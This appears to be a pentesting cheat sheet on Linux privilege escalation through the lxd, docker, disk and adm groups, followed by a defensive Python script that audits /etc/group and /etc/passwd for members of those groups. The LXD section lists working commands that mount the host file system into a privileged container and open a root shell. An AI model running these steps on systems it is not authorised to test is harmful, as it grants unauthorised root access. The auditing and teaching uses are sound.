Privileged Groups

LXC/LXD

Reference: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

  1. Check group membership

    $ id
    
    uid=1009(devops) gid=1009(devops) groups=1009(devops),110(lxd)
  2. Unzip alpine image

    $ unzip alpine.zip 
  3. Start the LXD initialization process. Consult this post for more information on each step.

    $ lxd init
  4. Import the local image

    $ lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine
  5. Start a privileged container

    $ lxc init alpine r00t -c security.privileged=true
  6. Mount the host file system

    $ lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true
  7. Spawn a shell inside the container instance as root

    $ lxc start r00t
    $ lxc exec r00t /bin/sh

Docker

  1. Placing a user in the docker group is essentially equivalent to granting that user root access.

  2. A member of the group can spawn a new container with the host's /root directory mounted into it and read files or SSH keys from there.

Disk

Users within the disk group have read and write access to the block devices under /dev.

  1. Read /dev/sda1, which is typically the main device holding the OS file system

  2. Or write to files on it

ADM

Users within this group can access all logs stored in /var/log. This can be used to gather sensitive data stored in log files or to enumerate user actions and running cron jobs.
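As an added auditing example (not part of the original page), the following Python script parses /etc/group and /etc/passwd and lists every account that holds membership in one of the groups discussed above (lxd, docker, disk, adm), whether through the supplementary member list in /etc/group or through the account's primary GID in /etc/passwd. The sample file contents embedded in the script are constructed for the example; pass real paths on the command line to audit a host.

```python
"""Audit /etc/group and /etc/passwd for members of groups that grant
root-equivalent or sensitive access (lxd, docker, disk, adm).

Usage: python3 audit_groups.py [/etc/group /etc/passwd]
Without arguments it runs against the constructed sample data below."""
import sys

# Groups covered on this page and the access each membership implies.
PRIVILEGED_GROUPS = {
    "lxd": "can start a privileged container with the host file system mounted",
    "docker": "effectively root (can mount host paths into containers)",
    "disk": "raw read/write access to block devices under /dev",
    "adm": "can read every log under /var/log",
}


def parse_group(text):
    """Parse /etc/group lines (name:password:gid:member1,member2)
    into {group_name: (gid, [members])}."""
    groups = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue  # malformed line, skip rather than crash the audit
        members = [m for m in parts[3].split(",") if m]
        groups[parts[0]] = (int(parts[2]), members)
    return groups


def parse_passwd(text):
    """Parse /etc/passwd lines (name:x:uid:gid:...) into {user: primary_gid}."""
    users = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        users[parts[0]] = int(parts[3])
    return users


def audit(group_text, passwd_text, privileged=PRIVILEGED_GROUPS):
    """Return a sorted list of (user, group, reason) for every account that is a
    member of a privileged group, counting both the member list in /etc/group
    and accounts whose primary GID is that group (those never appear in the
    member list, so a grep of /etc/group alone would miss them)."""
    groups = parse_group(group_text)
    users = parse_passwd(passwd_text)
    findings = set()
    for gname, reason in privileged.items():
        if gname not in groups:
            continue
        gid, members = groups[gname]
        for member in members:
            findings.add((member, gname, reason))
        for user, primary_gid in users.items():
            if primary_gid == gid:
                findings.add((user, gname, reason))
    return sorted(findings)


# Constructed sample data for the example; not taken from any real host.
SAMPLE_GROUP = """root:x:0:
adm:x:4:syslog,alice
disk:x:6:
lxd:x:110:devops
docker:x:999:bob,devops
users:x:100:
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
devops:x:1009:1009::/home/devops:/bin/bash
alice:x:1001:1001::/home/alice:/bin/bash
bob:x:1002:1002::/home/bob:/bin/bash
backup:x:34:6:backup:/var/backups:/usr/sbin/nologin
syslog:x:104:4::/home/syslog:/usr/sbin/nologin
"""


def main(argv):
    if len(argv) == 3:
        with open(argv[1]) as f:
            group_text = f.read()
        with open(argv[2]) as f:
            passwd_text = f.read()
    else:
        group_text, passwd_text = SAMPLE_GROUP, SAMPLE_PASSWD
    for user, group, reason in audit(group_text, passwd_text):
        print(f"{user:<10} {group:<7} {reason}")


if __name__ == "__main__":
    main(sys.argv)
```

On the sample data the audit reports devops in both lxd and docker, bob in docker, alice and syslog in adm, and backup in disk; the last one is found only through its primary GID, which is why the script reads /etc/passwd as well as /etc/group.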
